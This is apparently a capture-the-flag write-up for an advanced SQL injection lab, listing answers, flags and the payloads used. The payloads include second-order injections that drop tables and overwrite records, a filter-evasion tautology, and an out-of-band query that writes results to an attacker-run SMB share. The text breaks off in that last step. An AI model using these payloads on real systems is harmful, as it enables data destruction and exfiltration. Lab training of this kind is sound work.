Advanced SQL Injection

Task 1 - Introduction

Q1. What is the port on which MySQL service is running?

Answer 👉 3306

Task 2 - Quick Recap

Q1. What type of SQL injection uses the same communication channel for both the injection and data retrieval?

Answer 👉 In-band

Q2. In out-of-band SQL injection, which protocol is usually used to send query results to the attacker's server?

Answer 👉 HTTP

Task 3 - Second-Order SQL Injection

Q1. What is the flag value after updating the title of all books to "compromised"?

Add a book with ssn name - 143'; UPDATE books SET book_name="compromised"; -- - then go to update page and update that book.

Answer - THM{SO_HACKED}

Q1. What is the flag value once you drop the table hello from the database?

Add a book with ssn name - 7'; DROP TABLE hello ;-- - then go to update page and update that book.

Answer - THM{Table_Dropped}

Task 4 - Filter Evasion Techniques

Q1. What is the MySQL error code once an invalid query is entered with bad characters?

Enter a single quote in search to get the error response -

Answer - 1064

Q1. What is the name of the book where book ID=6?

Search for ' || 1=1; -- - to get the output -

Answer - Animal Series

Task 5 - Filter Evasion Techniques (continued)

Q1. What is the password for the username "attacker"?

change the valure of username in url to attacker to ght the password -

Answer - tesla

Q1. Which of the following can be used if the SELECT keyword is banned? Write the correct option only.

Answer - c

Task 6 - Out-of-band SQL Injection

Q1. What is the output of the @@version on the MySQL server?

First we have to enable network share on attackbox (setup needed if you do it on your own pc).Following commands to enable -
cd /opt/impacket/examples
python3.9 smbserver.py -smb2support -comment "My Logs Server" -debug logs /tmp
cd /tmp
now the stored files can be accessed in /tmp

append the code '; SELECT @@version INTO OUTFILE '\\\\ATTACKBOX-IP-ADDRESS\\logs\\out.txt'; in the url. Then